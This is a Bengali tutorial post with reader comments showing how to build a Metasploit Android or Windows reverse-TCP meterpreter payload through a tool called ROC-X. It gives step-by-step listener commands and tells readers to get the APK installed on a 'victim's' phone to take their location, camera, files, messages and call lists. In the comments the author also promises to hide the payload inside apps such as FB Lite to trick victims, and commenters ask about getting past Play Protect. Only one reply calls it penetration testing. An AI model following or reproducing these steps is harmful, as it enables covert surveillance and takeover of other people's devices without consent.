হ্যালো , আসসালামুআলাইকুম বন্ধুরা সবাই কেমন আছেন? আশা করি অনেক ভাল আছেন। আমি সানাউর আসিফ, তো চলুন শুরু করা যাক আজকের টপিক।

Topic : Hack Device Via PayLoad

তো, আজকে আমরা MetaSploit Framework ব্যবহার করে এমন একটি payload তৈরি করব । যেটা দিয়ে আমরা একই নেটওয়ার্কে থাকা ডিভাইস কন্ট্রোল করতে পারব। এবং এই টুলসটি দিয়ে যেকোনো কাজ করতে পারবেন।

নিচে কিছু কাজ দেওয়া হলো :

১. ভিকটিমের লাইভ লোকেশন বের করতে পারবেন।
২.তার ফোনের সমস্ত ফাইল ভিডিও অডিও অ্যাক্সেস করতে পারবেন।
৩. তার ফোনে যেকোন ফাইল আপলোড করতে পারবেন।
৪. যেকোনো সময় ওই ফোনের ক্যামেরা অন করে ভিডিও নিতে পারবেন।
৫.স্ক্রিনশট এবং স্ক্রিন রেকর্ড করতে পারবেন।
৬. তার ফোনে যে কোন অ্যাপস ইন্সটল করে দিতে পারবেন।
৭. তার ফোনের যেকোন ইনফরমেশন নিতে পারবেন।
৮. যেকোনো সময় যেকোনো অডিও প্লে করতে পারবেন।
৯. যে কোন সিস্টেম কোড এক্সিকিউট করতে পারবেন।
১০. মেসেজ কল লিস্ট চেক করতে পারবেন।
১১. ওই ফোন থেকে যেকোনো জায়গায় মেসেজ সেন্ড করতে পারবেন।

এছাড়াও আরও অনেক অনেক কিছু করতে পারবেন যা আমি পরবর্তী পোস্টে দেখিয়ে দেব।

তো চলুন শুরু করা যাক মূল টপিক।

তো, যারা Kali NetHunter ইন্সটল না করেই এই পোস্ট এ এসে গেছেন। তারা নিচের পোস্ট থেকে Kali NetHunter ইন্সটল করে আসুন।

[ROC-X:06] এবার ইন্সটল করুন Android হ্যাকিং প্ল্যাটফর্ম Kali Linux NetHunter । Termux টুলস এর সাহায্যে। [Installation Only]

তো, প্রথমেই Termux ওপেন করে নিচের কমান্ড দিয়ে ROC-X টুলস চালু করতে হবে।

cd $HOME/roc-x

python main.py

এবার [4] MetaSploit Framework সিলেক্ট করতে 4 লিখে ইনপুট দিন।

এবার এখানে নিচের মত ইন্টারফেস দেখাবে। এবং এখানে বলবে যে এই সার্ভিস অন করার জন্য আপনাকে অবশ্যই Kali NetHunter ইনস্টল করা থাকতে হবে। তাই আমার আগের পোস্ট থেকে Kali NetHunter ইনস্টল করে নিন।

এবার Kali NetHunter ইন্সটল করা থাকলে নিচের মত y লিখে দিন।

এবার এখন আপনার ভিকটিমের যদি এন্ড্রয়েড ডিভাইস হয় তাহলে এখান থেকে [2] Create PayLoad for Android সিলেক্ট করবেন। আর যদি আপনার ভিকটিমের ডিভাইস একটি কম্পিউটার হয়, তাহলে [3] Create PayLoad for Windows সিলেক্ট করবেন। আমি এখন অ্যান্ড্রয়েডের তা দেখাবো। তাই আমি এখানে 2 লিখে ইনপুট দিলাম।

এবার নিচের মত দেখতে পাবেন যেখানে আপনার LHOST ইনপুট দিতে বলবে।

এখন LHOST টি বের করার জন্য আমাদেরকে বাম সাইড থেকে স্লাইড করতে হবে।

এবার নিচের মত New Session বাটনে ক্লিক করতে হবে।

এবার এখানে নিচের মত করে কমান্ডটি দিতে হবে।
ifconfig

এবার আপনি নিচের মত একটি আইপি দেখতে পাবেন ।
এটি কপি করে নিন
এবার

এবার আবারো স্লাইড করে প্রথম ট্যাবে চলে যাবেন।

এবার এখানে এসে কপি করা এড্রেসটি পেস্ট করে দেবেন।

এখানে যে কোন 4 ডিজিটের পোর্ট নাম্বার দিয়ে দিবেন।

এবার এখানে তৈরি করা PayLoad এর যা খুশি একটা নাম দিয়ে দিবেন।

এবার নিচের মত দেখতে পাবেন । এখানে আপনাকে 10 থেকে 15 মিনিট অপেক্ষা করতে হবে।


এবার নিচের মত আসলে বুঝবেন আপনার PayLoad টি ক্রিয়েট করা হয়ে গিয়েছে।

এবার এন্টার প্রেস করুন।

এবার [1] Start MetaSploit Console সিলেক্ট করার জন্য 1 লিখে ইনপুট দিন।

এবার এখানে আপনাকে 5 থেকে 10 মিনিট অপেক্ষা করতে হবে।

নিচের মত আসলে বুঝবেন ঠিকমতো কাজ হচ্ছে।

এবার আপনার টার্মিনালে ঠিক নিচের মত না আসলেও যদি শুধুমাত্র msf6> লেখাটি আসে তাহলে বুঝবেন আপনি ঠিকমতো কাজ করছেন।

এবার ওখানে নিচের কমান্ডটি দিন।

use exploit/multi/handler

এখন আপনি যদি কম্পিউটারের জন্য PayLoad টি বানিয়ে থাকেন তাহলে নিচের কমান্ডটি দিবেন।
set payload windows/meterpreter/reverse_tcp

আর আপনি যদি এন্ড্রয়েড এর জন্য PayLoad বানিয়ে থাকেন তাহলে নিচের কমান্ডটি দিবেন।
set payload android/meterpreter/reverse_tcp

আমি অ্যান্ড্রয়েডের জন্য করব তাই এখানে নিচের কমান্ডটি দিলাম।

এবার আপনাকে LHOST সিলেক্ট করতে হবে।

Payload তৈরি করার সময় যেই LHOST টি দিয়েছিলেন এখানে সেটি দিয়ে দিবেন।

যেমন আমি দিয়েছিলাম 127.0.0.1 । তাই আমি এখানে কমান্ড দিব ।
set LHOST 127.0.0.1

এবার Payload তৈরি করার সময় যেই LPORT টি দিয়েছিলেন এখানে সেটি দিয়ে দিবেন।

যেমন আমি দিয়েছিলাম 2580 । তাই আমি এখানে কমান্ড দিব ।
set LPORT 2580

এবার এখানে exploit লিখে কমান্ড দিবেন ।

এবার নিচের মত আসলে বুঝবেন আপনার টার্মিনাল ডাটা রাখার জন্য রেডি হয়ে গিয়েছে।

এবার আপনার ফোন মেমোরিতে চলে যান। সেখানে ROC-X নামে একটি ফোল্ডার দেখতে পাবেন।

ওখানে আপনি তৈরি করার সময় যে নাম দিয়েছিলেন সে নামে একটি সফটওয়্যার দেখতে পাবেন।

এখন এটি আপনি যার ডিভাইসের করতে চান তার ফোনে কোন ভাবে ইন্সটল করিয়ে দেবেন। ইনস্টল করা এটি অটোমেটিক্যালি সব পারমিশন পেয়ে যাবে। আলাদা করে দেওয়ার প্রয়োজন নেই। শুধুমাত্র একবার Open বাটনে ক্লিক করবেন।

(তো অনেকে এখানে বলবেন যে ভিকটিমের ফোনে তো সে এরকম সফটওয়্যার ইন্সটল করবে না। তবুও সমস্যা নেই । আমি পরবর্তী পোস্টে দেখাবো কিভাবে যে কোন অ্যাপের সাথে আপনি আপনার PayLoad বাইন্ড করে দেবেন।)

ভিকটিমের ফোনে এটি একবার ওপেন করার পর Termux ফিরে এসে দেখবেন ওখানে একটি টার্মিনাল ওপেন হবে এবং ওখানে লেখা থাকবে meterpreter>

আর এটি লেখা থাকলে বুঝবেন আপনার টার্মিনাল ভিকটিমের ফোনের সাথে কানেক্ট হয়ে গিয়েছে।

এখন আপনি ওই ভিকটিমের ফোনে যা খুশি করতে পারেন।
তো কি কি করতে পারবেন এবং কোন কমান্ড দিয়ে কি করবেন তা দেখার জন্য help লিখে কমান্ড দিতে হবে ।

( তবুও আমি কাজের জন্য কিভাবে কোন কমান্ডটি রান করাতে হবে তা নিয়ে পরবর্তীতে পোস্ট দিব ইনশাল্লাহ)

তো দেখুন নিচের সকল কমান্ড এবং কমান্ডার কাজ লেখা চলে আসছে।

তো আমি এখন খুবই সহজ দুইটি কমান্ড দিয়ে দেখাচ্ছি।

তো দেখুন আমি প্রথমেই check_root লিখে কমান্ড দিলাম। এবং এটি নিচে লেখা আসলো The Device is Not Rooted । তার মানে আমি যে ফোনে PayLoad টি ইন্সটল করেছিলাম সেটি Rooted না।

তো এখন আমি দেখবো ওই ফোনে কি কি অ্যাপস ইন্সটল করা আছে। তাই আমি কমান্ড দিলাম app_list

তো এবার দেখুন এখানে ভিকটিম এর ফোনের সকল অ্যাপসের লিস্ট দেখিয়ে দিয়েছে।

তো এভাবেই এখানে আপনার যা খুশি তাই করতে পারবেন যে কোন কমান্ড রান করে। তবুও আমি পরবর্তীতে সবগুলো কমান্ড নিয়ে একটি পোস্ট করব ইনশাল্লাহ।

তো আজকে এই পর্যন্তই ছিল।

My YouTube Channel

কোথাও কোন সমস্যা হলে What’s App Group এ জানাতে পারেন। Solve করে দিব ইনশাআল্লাহ।
ROC-X What’s App Group

পোস্টটি কেমন লাগলো অবশ্যই কমেন্টে জানাবেন এবং কোন সমস্যা/ভুল হলে সেটাও কমেন্টে জানাবেন । ধন্যবাদ সবাইকে। আল্লাহ হাফেজ।

40 thoughts on "[ROC-X:10] একই WiFi এ কানেক্টেড থাকা / Hotspot দিয়ে কানেক্টেড থাকা যে কোন Android / PC হ্যাক করে ফেলুন। [MetaSploit PayLoad]"

  1. Rayin Rayin Contributor says:
    Target er phone e app ta ki sob somoy running obosthay thakte hobe?
    1. SåÑàÜr ãSïF Author Post Creator says:
      Background e running thaklei hbe… Valo hoy battery optimization off kore dile
  2. Sohel Rana Sohel Rana Contributor says:
    victim ato pagla na je tar phone apps install korte dibe
    1. SåÑàÜr ãSïF Author Post Creator says:
      Next e Onno app er Sathe Bind korar trick dibo bro….

      Like : FB Lite app diben… Se chalabeo FB Lite… But Oitar vitorei PayLoad thakbe

  3. Shakib Shakib Author says:
    Liked Content🔥
    ☠☠☠
    1. SåÑàÜr ãSïF Author Post Creator says:
      Thanks 🥰
    1. SåÑàÜr ãSïF Author Post Creator says:
      Thanks 🥰
  4. Vodrosoytan Vodrosoytan Contributor says:
    Play protect on thakle warning dekhabe na?
    1. SåÑàÜr ãSïF Author Post Creator says:
      Amar test kora kono device e dey ni… Bakita Jani na
  5. Rakib145 Rakib145 Contributor says:
    Apnar Facebook link ta den plz,,need your help
  6. rakibtot Contributor says:
    Apps ta jekono phone a install kore dilei hobe?
    R storage er everything dekhar jonno ki korte hobe? Ki command?
    Ami ki victim er browser open kore kono kisu browse korte parbo?
    1. SåÑàÜr ãSïF Author Post Creator says:
      Hmm..parben….next post e eta niyei dibo insha’Allah
  7. ruhul45 ruhul45 Contributor says:
    ato bejal na kore oi apps er download link din
    1. SåÑàÜr ãSïF Author Post Creator says:
      Vaia Kichu na bujhe comment kora thik na…
      Eta kono apps na…
      Eta Penetration Tool…
      Apni jegula use koren segulo etar concept thekei banano….
      So, please age valovabe post pore, valovabe bujhe then comment korben
  8. Trickbd Lover Trickbd Lover Contributor says:
    vai amon ekta way bolen jetar mardome victim er data jekono sommoy on off korte parboo
    1. SåÑàÜr ãSïF Author Post Creator says:
      Ei command ta nai akhono… But tools bananor try korbo insha’Allah 🥰
  9. Diponray Contributor says:
    ভিকটিম নেট কালেকশন অফ করে অন করলে
    তোমার হ্যাক কোন কাজে লাগবে না
    ইতিহাস সেষ
    অানেক অাগে এগুলা করছি
  10. Diponray Contributor says:
    সুধু সুধু মানুষ কে বোকা বানানো
    1. SåÑàÜr ãSïF Author Post Creator says:
      এখানে কিভাবে কোন কারণে আপনার এটাকে বোকা বানানো মনে হলো?

      ভাই কোন কিছু না বুঝে কমেন্ট করা ঠিক না।

      প্রথমত, এটা আমার বানানো কোন হ্যাক না ।

      আর আপনি বললেন যে নেট কানেকশন বন্ধ করলে হ্যাক কাজে লাগবে না।

      তো ভাই আমাকে দেখান যে পোস্ট এর কোন জায়গায় আমি লিখেছি যে এটা ইন্টারনেট কানেকশন ছাড়াই কাজ করবে?

      আর আপনি এটাও দেখাবেন যে কোন অ্যাপ ইন্টারনেট কানেকশন ছাড়াই ডিভাইস ডাটা ট্রান্সফার করতে পারে। এটা তো ছোট বাচ্চা ও বুঝবে যে ডাটা ট্রান্সফার করতে হলে ইন্টারনেট কানেকশন লাগবেই।

      আর আপনি বললেন যে আপনি এগুলো অনেক আগেই করেছেন,
      আর আপনার মতো মানুষের জন্যই আমি টাইটেল এ MetaSploit PayLoad লিখে দিয়েছি। যেটা মেইন ফ্রেমওয়ার্ক এর নাম।

      আপনি যদি আগে এগুলো করেই থাকতেন তাহলে আর এই পোস্ট এ আসতেন না, আর আসলেও ইন্টারনেট কানেকশন এর ঐ প্রশ্ন টা করতেন না।

    1. SåÑàÜr ãSïF Author Post Creator says:
      Apni hoyto vul platform select korechilen…

      Android hole 2 & Windows hole 3 diye try korben .
      insha’Allah thik hoye jabe

  11. নেট অফ থাকলে কি কাজ করবে এটা ভাই
    1. SåÑàÜr ãSïF Author Post Creator says:
      Na vai
  12. K M Faruk islam K M Faruk islam Author says:
    আপনি তো বললেন Wi-Fi / Hotspot
    এ কানেক্টেড থাকা ডিভাইস?
    1. SåÑàÜr ãSïF Author Post Creator says:
      Hmmm… Connect thakte hbe🙂
    2. K M Faruk islam K M Faruk islam Author says:
      কিন্তু আপনি তো কোন Wi-fi এ কানেক্ট ছিলেন না।
    3. SåÑàÜr ãSïF Author Post Creator says:
      Vaia ETA kaj Kore localhost e … R apni kono WiFi / Hotspot e connect thakle local iP ta same hoye Jay…. Tai ETA Korar jonno WiFi/Hotspot e connect thakte hoy..

      R Apni Jodi nijer phone e install Koren to apnar local ip to emnitei same thakbe…. R ekhane ami amar phone ei install kore dekhiyechi…. Tai WiFi/Hotspot connect kora lage ni..

      Asha kori bujhte perechen😊😊

  13. Nabil1122 Contributor says:
    time wasting. people are not stupid now. In fact, play protect will warn the user.if such fool exist, you won’t get any important thing by controlling his phone
    1. SåÑàÜr ãSïF Author Post Creator says:
      Lol. But the MetaSploit FrameWork always make undetectable PayLoad . It also make that Automatically gain the permissions. Sometimes, it detected by Google Play Protect. But for this , we are giving the trick of Binding PayLoad at Any APK File.
      It’s just for penetration testing.
      I think you will be able to understand
  14. Nabil1122 Contributor says:
    But I appreciate your efforts
    1. SåÑàÜr ãSïF Author Post Creator says:
      Thanks for that
  15. Sayeed Sayeed Contributor says:
    Agolo korte rooted device dorkar?
    1. SåÑàÜr ãSïF Author Post Creator says:
      Naa
  16. Rakib Rakib Author says:
    সুন্দর পোস্ট
    1. SåÑàÜr ãSïF Author Post Creator says:
      Thanks 🥰
    1. SåÑàÜr ãSïF Author Post Creator says:
      Thanks 🥰

Leave a Reply